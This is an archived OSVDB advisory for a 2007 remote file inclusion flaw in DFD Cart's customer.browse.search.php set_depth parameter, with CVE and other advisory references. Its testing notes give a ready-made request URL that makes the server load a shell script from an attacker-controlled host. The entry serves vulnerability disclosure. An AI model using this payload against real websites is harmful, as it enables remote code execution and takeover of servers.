DFD Cart customer.area/customer.browse.search.php set_depth Variable Remote File Inclusion

2007-09-24T00:00:00
ID OSVDB:37229
Type osvdb
Reporter OSVDB
Modified 2007-09-24T00:00:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://[attacker]/shell.txt?

References:

Secunia Advisory ID:26920 Related OSVDB ID: 37227 Related OSVDB ID: 37228 Other Advisory URL: http://milw0rm.com/exploits/4451 ISS X-Force ID: 36753 FrSIRT Advisory: ADV-2007-3255 CVE-2007-5098 Bugtraq ID: 25775